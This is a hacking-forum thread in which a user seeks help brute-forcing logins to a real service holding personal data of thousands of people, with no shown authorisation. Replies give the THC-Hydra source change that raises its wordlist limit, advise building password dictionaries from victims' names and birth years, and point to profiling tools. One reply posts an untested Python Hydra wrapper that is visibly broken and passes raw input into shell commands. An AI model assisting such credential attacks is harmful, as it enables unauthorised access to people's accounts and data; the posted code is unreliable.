How to remove THC-Hydra password limit?
#1
Safe surfing to all of you.

I need to use large wordlist for 6 character password brute force, but if I am try to use my list, Hydra is swears on me because of 50,000,000 passwords limit.
So, what can I do with it? Do I need patch it and how?
Reply
#2
(04-24-2021, 05:43 PM)PurpleSystem Wrote: Safe surfing to all of you.

I need to use large wordlist for 6 character password brute force, but if I am try to use my list, Hydra is swears on me because of 50,000,000 passwords limit.
So, what can I do with it? Do I need patch it and how?

Can't you split the wordlist in parts? 50M is very excessive. It will take you an eternity to do that.
And in another note, what are you trying to crack? Sending that many petitions will get you totally blocked.

EDIT: 50M is the limit, I don't even want to know how long is your wordlist...
I hope you are not trying to add a wordlist with literally all the combinations for 6 characters because that's 36^6 = 2.176.782.336 possibilities if you are only considering alpha-numeric characters.
Reply
#3
Recompile with the following change:
hydra.c >
Line 223:
Code:
#define MAX_LINES 50000000

to

Code:
#define MAX_LINES 65000000

bumping it up to 65M.

Needs a lot more modifications for supporting anything more than 65M. You might be able to get 65.5M at most out of it, I'm not 100% sure how the code works since most of it uses pretty outdated standards and hydra.c is if/else hell, but IIRC it has something to do with the fact that the length of the file is stored in a size_t (16bit) type and cast to 32/64bit depending on the compiler.
Reply
#4
(04-24-2021, 06:01 PM)enmafia2 Wrote: Can't you split the wordlist in parts? 50M is very excessive. It will take you an eternity to do that.
And in another note, what are you trying to crack? Sending that many petitions will get you totally blocked.

Sorry for miss understanding.
Yes, I am want to crack real service, but with white-hat hacking purposes. My target is a potential database of 2000~4000 peoples with their names, surnames and numbers and maybe even more data (including mine). This data storing under weak passwords and public phone numbers as username.
I said them about potential risks, but nobody believed me. So, I want to proof them that even noob "hacker" like me can crack it.

There is one note: When we only start implement this service I and some other peoples doesn't gave them agreement to use confidential information, therefore they break the laws of my country.

EDIT: I have an access to computer with password and username autofill in Chrome.
Reply
#5
(04-24-2021, 08:22 PM)PurpleSystem Wrote:
(04-24-2021, 06:01 PM)enmafia2 Wrote: Can't you split the wordlist in parts? 50M is very excessive. It will take you an eternity to do that.
And in another note, what are you trying to crack? Sending that many petitions will get you totally blocked.

Sorry for miss understanding.
Yes, I am want to crack real service, but with white-hat hacking purposes. My target is a potential database of 2000~4000 peoples with their names, surnames and numbers and maybe even more data (including mine). This data storing under weak passwords and public phone numbers as username.
I said them about potential risks, but nobody believed me. So, I want to proof them that even noob "hacker" like me can crack it.

There is one note: When we only start implement this service I and some other peoples doesn't gave them agreement to use confidential information, therefore they break the laws of my country.

EDIT: I have an access to computer with password and username autofill in Chrome.

Just my two cents: I would just stick to most famous passwords. I am very confident that in a database of 2k-4k people there will be users with very simple passwords. Get some of them and get in the system, then try to leverage from that.

Plus if you make passwords with their info, you mentioned there are names, surnames and numbers. It is very common to see people with passwords being: Susan86. 86 as their date of birth or any important date for them. Make custom dictionaries from that data, there are tools for that out there.

Good luck with it.
Reply
#6
(04-26-2021, 08:32 PM)enmafia2 Wrote: Plus if you make passwords with their info, you mentioned there are names, surnames and numbers. It is very common to see people with passwords being: Susan86. 86 as their date of birth or any important date for them. Make custom dictionaries from that data, there are tools for that out there.

Good luck with it.

Yeah, agreed. Ditto; Try to go for the more generic passwords to get the masses. Maybe get or build combo-lists to try, not sure if Hydra has support for this.

But now for more targeted approaches, if you know the user you are trying to target. Try password profiling tools such as:
CUPP: https://github.com/Mebus/cupp (http://www.remote-exploit.org/articles/m...index.html)
Who's your daddy (WYD): https://www.darknet.org.uk/2006/11/wyd-a...ling-tool/ (http://www.remote-exploit.org/articles/m...index.html)
Reply
#7
(04-24-2021, 06:17 PM)poppopret Wrote: Recompile with the following change:

hydra.c >

Line 223:

Code:
#define MAX_LINES 50000000



to



Code:
#define MAX_LINES 65000000



bumping it up to 65M.



Needs a lot more modifications for supporting anything more than 65M. You might be able to get 65.5M at most out of it, I'm not 100% sure how the code works since most of it uses pretty outdated standards and hydra.c is if/else hell, but IIRC it has something to do with the fact that the length of the file is stored in a size_t (16bit) type and cast to 32/64bit depending on the compiler.

This if you want to work on the source code. Alternatively instead of using THC-HYDRA why not use Patator? As far as i am aware it has no upper limit.

Failing that you can always use a Python wrapper for Hydra. In fact i was bored so i wrote a quick one for you, might have a bug or two, because i haven't tested it yet. But feel free to fix it or make any adjustments to it that you may desire.

Code:
#!/usr/bin/env python3
#____  ____            __
#\  \ /  /____  _____/  |_  ___________
# \  Y  // __ \_/ ___\  __\/  _ \_  __ \
#  \    /\  ___/\  \___|  | (  <_> )  | \/
#  \___/  \___  >\___  >__|  \____/|__|
#              \/    \/
#----Authored by Vector/NullArray
##############################################
import os
import sys
import time
import random

TOTAL_LINES = 0
MAX_LINES  = 50000000

def names():   
    NEW = ['A1','B1','C1','D1','A2','B2','C2','D2']
    while True:
        name = "output" + random.choice(NEW) + ".txt"
        if not os.isfile(name):
            return name
   

def lists_processing(f_path=''): 
    if f_path == '':
        return print("[!] No path specified")
    elif f_path != '':
        try:
            with open('r', f_path) as infile:
                infile.read()
        except IOError:
            return print("[!] Invalid path specified")
   
    for i in xrange(MAX_LINES):
        for lines in infile:   
            TOTAL_LINES +=1
       
        if TOTAL_LINES >= MAX_LINES or TOTAL_LINES == MAX_LINES:
            n = names()
            try:
                os.system("tail -n " + MAX_LINES + " " + f_path + " >> " n)
            except Exception as e:
                print("[!] Operation Failed")
                time.sleep(2)
                sys.exit(e)
            continue   
        else:
            return "True"   
       
     

                   
def main(targets='',user='',passw=''):
    os.system("hydra -l" + user +" -P " + passw + " -M " + targets)
   
   
if __name__ == '__main__':
   
    targets=input("[+] Path to target list.")
    if os.isfile(targets):
        print("[+] List found")
    else:
        print("[!] List not found")
        sys.exit(0)
       
    user=input("[+] Path to user list.")
    if os.isfile(user):
        print("[+] List found")
    else:
        print("[!] List not found")
        sys.exit(0)
   
    while True:
        passw=input("[+] Path to password list.")
        if os.isfile(passw):
            print("[+] List found")
            print("[+] Checking length, auto resolving...")
            a = lists_processing(passw)
        if "path" in a:
            print("[!] List not found")
            sys.exit(0)
        elif "True" in path:
            print("[+] Lists found and resolved.\nShowing new lists if applicable.")
            os.system("ls *.txt")
           
            q=input("[+] Enter new password file? [Y/n or Q to Quit]: ").lower()
            if 'y'in q:
                passw=input("[+] Path to password list.")
                main(targets,user,passw)
            elif 'n' in q:
                main(targets,user,passw)
            elif 'q' in q:
                print("[!] Quitting...")
                sys.exit(0)           
            else:
                print("[!] Unhandled Option")
                sys.exit(0)
                   
        else:
            print("[!] List not found")
            sys.exit(0)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Can you name a few open source tools for offline password cracking? ShadowRaider 2 9,748 06-30-2020, 01:54 AM
Last Post: poppopret
  How Secure is Your Password? Cryptography 21 41,034 12-29-2016, 08:12 PM
Last Post: VenAAX
  Group Policy Preference Password finder. Vector 4 14,150 06-06-2016, 07:45 PM
Last Post: Vector
  2,000,000+ Password List Cryptography 0 8,995 06-10-2015, 10:36 PM
Last Post: Cryptography